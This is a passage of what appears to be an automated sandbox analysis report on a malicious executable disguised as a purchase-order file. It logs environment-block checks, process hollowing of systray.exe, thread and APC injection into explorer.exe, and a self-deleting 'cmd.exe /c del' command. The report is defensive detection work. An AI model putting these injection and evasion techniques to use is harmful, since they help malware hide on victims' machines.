          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]4_2_00F70EA5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]4_2_00F70EA5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]4_2_00F70EA5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F246A7 mov eax, dword ptr fs:[00000030h]4_2_00F246A7
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBAAB0 mov eax, dword ptr fs:[00000030h]4_2_00EBAAB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBAAB0 mov eax, dword ptr fs:[00000030h]4_2_00EBAAB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDFAB0 mov eax, dword ptr fs:[00000030h]4_2_00EDFAB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FE87 mov eax, dword ptr fs:[00000030h]4_2_00F3FE87
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDD294 mov eax, dword ptr fs:[00000030h]4_2_00EDD294
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDD294 mov eax, dword ptr fs:[00000030h]4_2_00EDD294
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB766D mov eax, dword ptr fs:[00000030h]4_2_00EB766D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE927A mov eax, dword ptr fs:[00000030h]4_2_00EE927A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5B260 mov eax, dword ptr fs:[00000030h]4_2_00F5B260
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5B260 mov eax, dword ptr fs:[00000030h]4_2_00F5B260
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78A62 mov eax, dword ptr fs:[00000030h]4_2_00F78A62
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F34257 mov eax, dword ptr fs:[00000030h]4_2_00F34257
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]4_2_00EA9240
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]4_2_00EA9240
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]4_2_00EA9240
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]4_2_00EA9240
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE4A2C mov eax, dword ptr fs:[00000030h]4_2_00EE4A2C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE4A2C mov eax, dword ptr fs:[00000030h]4_2_00EE4A2C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5FE3F mov eax, dword ptr fs:[00000030h]4_2_00F5FE3F
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAE620 mov eax, dword ptr fs:[00000030h]4_2_00EAE620
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB8A0A mov eax, dword ptr fs:[00000030h]4_2_00EB8A0A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]4_2_00EAC600
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]4_2_00EAC600
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]4_2_00EAC600
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED8E00 mov eax, dword ptr fs:[00000030h]4_2_00ED8E00
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC3A1C mov eax, dword ptr fs:[00000030h]4_2_00EC3A1C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA61C mov eax, dword ptr fs:[00000030h]4_2_00EDA61C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA61C mov eax, dword ptr fs:[00000030h]4_2_00EDA61C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]4_2_00EA5210
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov ecx, dword ptr fs:[00000030h]4_2_00EA5210
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]4_2_00EA5210
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]4_2_00EA5210
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAA16 mov eax, dword ptr fs:[00000030h]4_2_00EAAA16
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAA16 mov eax, dword ptr fs:[00000030h]4_2_00EAAA16
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61608 mov eax, dword ptr fs:[00000030h]4_2_00F61608
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECDBE9 mov eax, dword ptr fs:[00000030h]4_2_00ECDBE9
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE37F5 mov eax, dword ptr fs:[00000030h]4_2_00EE37F5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F253CA mov eax, dword ptr fs:[00000030h]4_2_00F253CA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F253CA mov eax, dword ptr fs:[00000030h]4_2_00F253CA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]4_2_00ED4BAD
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]4_2_00ED4BAD
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]4_2_00ED4BAD
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F75BA5 mov eax, dword ptr fs:[00000030h]4_2_00F75BA5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB1B8F mov eax, dword ptr fs:[00000030h]4_2_00EB1B8F
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB1B8F mov eax, dword ptr fs:[00000030h]4_2_00EB1B8F
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]4_2_00F27794
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]4_2_00F27794
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]4_2_00F27794
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5D380 mov ecx, dword ptr fs:[00000030h]4_2_00F5D380
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2397 mov eax, dword ptr fs:[00000030h]4_2_00ED2397
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F6138A mov eax, dword ptr fs:[00000030h]4_2_00F6138A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDB390 mov eax, dword ptr fs:[00000030h]4_2_00EDB390
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB8794 mov eax, dword ptr fs:[00000030h]4_2_00EB8794
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EADB60 mov ecx, dword ptr fs:[00000030h]4_2_00EADB60
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBFF60 mov eax, dword ptr fs:[00000030h]4_2_00EBFF60
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED3B7A mov eax, dword ptr fs:[00000030h]4_2_00ED3B7A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED3B7A mov eax, dword ptr fs:[00000030h]4_2_00ED3B7A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78F6A mov eax, dword ptr fs:[00000030h]4_2_00F78F6A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EADB40 mov eax, dword ptr fs:[00000030h]4_2_00EADB40
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBEF40 mov eax, dword ptr fs:[00000030h]4_2_00EBEF40
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78B58 mov eax, dword ptr fs:[00000030h]4_2_00F78B58
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAF358 mov eax, dword ptr fs:[00000030h]4_2_00EAF358
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA4F2E mov eax, dword ptr fs:[00000030h]4_2_00EA4F2E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA4F2E mov eax, dword ptr fs:[00000030h]4_2_00EA4F2E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDE730 mov eax, dword ptr fs:[00000030h]4_2_00EDE730
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FF10 mov eax, dword ptr fs:[00000030h]4_2_00F3FF10
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FF10 mov eax, dword ptr fs:[00000030h]4_2_00F3FF10
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA70E mov eax, dword ptr fs:[00000030h]4_2_00EDA70E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA70E mov eax, dword ptr fs:[00000030h]4_2_00EDA70E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F6131B mov eax, dword ptr fs:[00000030h]4_2_00F6131B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7070D mov eax, dword ptr fs:[00000030h]4_2_00F7070D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7070D mov eax, dword ptr fs:[00000030h]4_2_00F7070D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECF716 mov eax, dword ptr fs:[00000030h]4_2_00ECF716
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148D34 mov eax, dword ptr fs:[00000030h]14_2_05148D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513E539 mov eax, dword ptr fs:[00000030h]14_2_0513E539
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]14_2_050A4D3B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]14_2_050A4D3B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]14_2_050A4D3B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507AD30 mov eax, dword ptr fs:[00000030h]14_2_0507AD30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050FA537 mov eax, dword ptr fs:[00000030h]14_2_050FA537
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B3D43 mov eax, dword ptr fs:[00000030h]14_2_050B3D43
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F3540 mov eax, dword ptr fs:[00000030h]14_2_050F3540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05097D50 mov eax, dword ptr fs:[00000030h]14_2_05097D50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509C577 mov eax, dword ptr fs:[00000030h]14_2_0509C577
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509C577 mov eax, dword ptr fs:[00000030h]14_2_0509C577
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AFD9B mov eax, dword ptr fs:[00000030h]14_2_050AFD9B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AFD9B mov eax, dword ptr fs:[00000030h]14_2_050AFD9B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A35A1 mov eax, dword ptr fs:[00000030h]14_2_050A35A1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051405AC mov eax, dword ptr fs:[00000030h]14_2_051405AC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051405AC mov eax, dword ptr fs:[00000030h]14_2_051405AC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]14_2_050A1DB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]14_2_050A1DB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]14_2_050A1DB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov ecx, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05128DF1 mov eax, dword ptr fs:[00000030h]14_2_05128DF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508D5E0 mov eax, dword ptr fs:[00000030h]14_2_0508D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508D5E0 mov eax, dword ptr fs:[00000030h]14_2_0508D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]14_2_0513FDE2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]14_2_0513FDE2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]14_2_0513FDE2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]14_2_0513FDE2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]14_2_050F6C0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]14_2_050F6C0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]14_2_050F6C0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]14_2_050F6C0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]14_2_0514740D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]14_2_0514740D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]14_2_0514740D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050ABC2C mov eax, dword ptr fs:[00000030h]14_2_050ABC2C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510C450 mov eax, dword ptr fs:[00000030h]14_2_0510C450
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510C450 mov eax, dword ptr fs:[00000030h]14_2_0510C450
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA44B mov eax, dword ptr fs:[00000030h]14_2_050AA44B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509746D mov eax, dword ptr fs:[00000030h]14_2_0509746D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508849B mov eax, dword ptr fs:[00000030h]14_2_0508849B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148CD6 mov eax, dword ptr fs:[00000030h]14_2_05148CD6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051314FB mov eax, dword ptr fs:[00000030h]14_2_051314FB
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6CF0 mov eax, dword ptr fs:[00000030h]14_2_050F6CF0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Memory written: C:\Users\user\Desktop\PO-RFQ # 097663899.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\systray.exe; Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 10C0000
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exe; Process created: C:\Users\user\Desktop\PO-RFQ # 097663899.exe C:\Users\user\Desktop\PO-RFQ # 097663899.exe
          Source: C:\Windows\SysWOW64\systray.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO-RFQ # 097663899.exe'
          Source: explorer.exe, 00000006.00000000.272654375.0000000005EA0000.00000004.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmp; Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000002.493868984.0000000001128000.00000004.00000020.sdmp; Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000002.495093416.0000000001640000.00000002.00000001.sdmp, systray.exe, 0000000E.00000002.494551597.00000000037D0000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
